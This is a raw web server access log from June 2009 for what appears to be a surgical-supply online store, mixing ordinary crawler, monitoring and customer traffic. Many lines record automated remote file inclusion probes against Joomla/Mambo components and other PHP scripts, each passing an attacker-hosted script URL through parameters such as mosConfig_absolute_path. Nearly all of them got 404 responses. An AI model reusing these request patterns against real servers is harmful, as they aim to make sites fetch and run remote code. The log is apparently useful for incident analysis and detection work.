74.200.195.130 - - [24/Jun/2009:05:59:54 -0400] "GET /help.php?css_path=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:05:59:54 -0400] "GET /logs/help.php?css_path=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
66.249.71.57 - - [24/Jun/2009:06:00:45 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0190604009133900D06006G+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
117.74.99.225 - - [24/Jun/2009:06:01:01 -0400] "GET /logs/access_log.Q109051300%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:06:01:16 -0400] "GET /logs/access_log.Q109052700%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:06:01:17 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.71.57 - - [24/Jun/2009:06:01:50 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0190604009B35900D36006G+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
63.223.104.57 - - [24/Jun/2009:06:01:55 -0400] "GET /logs/access_log.Q109060800/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810"
119.198.187.8 - - [24/Jun/2009:06:01:59 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
119.198.187.8 - - [24/Jun/2009:06:01:59 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
119.198.187.8 - - [24/Jun/2009:06:02:05 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
119.198.187.8 - - [24/Jun/2009:06:02:05 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
87.106.252.92 - - [24/Jun/2009:06:02:09 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
87.106.252.92 - - [24/Jun/2009:06:02:09 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
87.106.252.92 - - [24/Jun/2009:06:02:09 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
208.111.94.201 - - [24/Jun/2009:06:02:13 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:06:02:13 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:06:02:13 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
87.106.252.92 - - [24/Jun/2009:06:02:15 -0400] "GET /logs/error_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
89.38.128.43 - - [24/Jun/2009:06:02:18 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:06:02:18 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:06:02:18 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:06:02:29 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:06:02:29 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:06:02:29 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:06:02:29 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
117.74.99.225 - - [24/Jun/2009:06:02:52 -0400] "GET /logs/access_log.Q109052200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:06:02:55 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:06:02:57 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:06:02:57 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.71.57 - - [24/Jun/2009:06:02:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01105F4E14A3C400D3F0012+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.238.86.1 - - [24/Jun/2009:06:03:08 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
88.238.86.1 - - [24/Jun/2009:06:03:08 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
88.238.86.1 - - [24/Jun/2009:06:03:14 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
88.238.86.1 - - [24/Jun/2009:06:03:14 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
66.11.230.36 - - [24/Jun/2009:06:03:27 -0400] "GET /logs/error_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.65"
66.11.230.36 - - [24/Jun/2009:06:03:27 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
66.11.230.36 - - [24/Jun/2009:06:03:27 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
209.59.12.99 - - [24/Jun/2009:06:03:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.57 - - [24/Jun/2009:06:03:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01905D48021329004F3006E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.38.128.43 - - [24/Jun/2009:06:04:26 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.144.33 - - [24/Jun/2009:06:05:00 -0400] "GET /logs/access_log.Q109061300//////index2.php?page=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
66.249.71.57 - - [24/Jun/2009:06:05:05 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01905D48017319004C3006E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
63.223.104.57 - - [24/Jun/2009:06:05:07 -0400] "GET /logs/error_log.Q109051600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.810"
69.94.125.100 - - [24/Jun/2009:06:06:01 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.71.57 - - [24/Jun/2009:06:06:18 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L011062411C43140091F0021+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.111.94.201 - - [24/Jun/2009:06:06:58 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:06:07:09 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.249.71.57 - - [24/Jun/2009:06:07:21 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01106B461EF354001AC0025+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
63.223.104.57 - - [24/Jun/2009:06:07:30 -0400] "GET /logs/error_log.Q109060800/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.810"
172.16.1.180 - - [24/Jun/2009:06:07:47 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:06:07:47 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:06:07:47 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
63.223.104.57 - - [24/Jun/2009:06:07:54 -0400] "GET /logs/error_log.Q109060700/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.810"
66.249.71.57 - - [24/Jun/2009:06:08:20 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01105E431523F4001990011+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.94.125.100 - - [24/Jun/2009:06:08:26 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [24/Jun/2009:06:08:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.180 - - [24/Jun/2009:06:08:50 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:06:08:50 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:06:08:50 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
66.249.71.57 - - [24/Jun/2009:06:09:19 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01905F4003A359000A1006F+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.38.128.43 - - [24/Jun/2009:06:09:35 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.71.57 - - [24/Jun/2009:06:10:25 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0110614516835400A3D0013+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.16.1.180 - - [24/Jun/2009:06:10:39 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:06:10:39 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:06:10:39 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
121.169.189.169 - - [24/Jun/2009:06:11:19 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76246 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
208.111.94.201 - - [24/Jun/2009:06:12:07 -0400] "GET /logs/error_log.Q109053100%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:06:12:10 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:06:12:10 -0400] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:06:12:10 -0400] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
63.223.104.57 - - [24/Jun/2009:06:12:12 -0400] "GET /logs/error_log.Q109052400/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.810"
83.98.209.71 - - [24/Jun/2009:06:13:19 -0400] "GET /logs/access_log.Q109052800/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
121.169.189.169 - - [24/Jun/2009:06:13:29 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01610B4A13039200E1A0066+M37+ENG HTTP/1.1" 200 37509 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
209.59.12.99 - - [24/Jun/2009:06:13:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.57 - - [24/Jun/2009:06:13:36 -0400] "GET /images/over-index2_bladehandles.jpg HTTP/1.1" 200 2060 "-" "Googlebot-Image/1.0"
121.169.189.169 - - [24/Jun/2009:06:13:37 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01610C461EF3C20065B0066+M37+ENG HTTP/1.1" 200 76661 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01610B4A13039200E1A0066+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
216.139.67.116 - - [24/Jun/2009:06:13:40 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:06:13:40 -0400] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:06:13:40 -0400] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
121.169.189.169 - - [24/Jun/2009:06:13:50 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01610C4D1C13A20061A0066+M37+ENG HTTP/1.1" 200 57443 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
216.139.67.116 - - [24/Jun/2009:06:14:06 -0400] "GET /logs/access_log.Q109052800/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
155.212.232.66 - - [24/Jun/2009:06:14:23 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:06:14:23 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:06:14:30 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:06:14:30 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
80.93.53.109 - - [24/Jun/2009:06:14:45 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:06:14:45 -0400] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:06:14:45 -0400] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.55.105.237 - - [24/Jun/2009:06:14:57 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.237 - - [24/Jun/2009:06:14:57 -0400] "GET /logs/error_log.Q108061400 HTTP/1.1" 404 223 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.71.57 - - [24/Jun/2009:06:15:30 -0400] "GET /logs/error_log.Q109052200 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.98.209.71 - - [24/Jun/2009:06:15:31 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
83.98.209.71 - - [24/Jun/2009:06:15:31 -0400] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
83.98.209.71 - - [24/Jun/2009:06:15:31 -0400] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
116.121.201.70 - - [24/Jun/2009:06:15:33 -0400] "GET /logs/access_log.Q109052500/components/com_simpleboard/image_upload.php?sbp=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:06:15:38 -0400] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
83.98.209.71 - - [24/Jun/2009:06:15:38 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
83.98.209.71 - - [24/Jun/2009:06:15:38 -0400] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
121.169.189.169 - - [24/Jun/2009:06:15:38 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01610C491133B2007CF0066+M37+ENG HTTP/1.1" 200 57558 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01610C4D1C13A20061A0066+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
216.139.67.116 - - [24/Jun/2009:06:15:43 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
216.139.67.116 - - [24/Jun/2009:06:15:44 -0400] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
83.98.209.71 - - [24/Jun/2009:06:15:44 -0400] "GET /logs/access_log.Q109052800/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
216.139.67.116 - - [24/Jun/2009:06:15:47 -0400] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
80.93.53.109 - - [24/Jun/2009:06:15:48 -0400] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
80.93.53.109 - - [24/Jun/2009:06:15:48 -0400] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
80.93.53.109 - - [24/Jun/2009:06:15:48 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
216.139.67.116 - - [24/Jun/2009:06:15:50 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
216.139.67.116 - - [24/Jun/2009:06:15:50 -0400] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
216.139.67.116 - - [24/Jun/2009:06:15:50 -0400] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
80.93.53.109 - - [24/Jun/2009:06:15:55 -0400] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
80.93.53.109 - - [24/Jun/2009:06:15:55 -0400] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
80.93.53.109 - - [24/Jun/2009:06:15:55 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
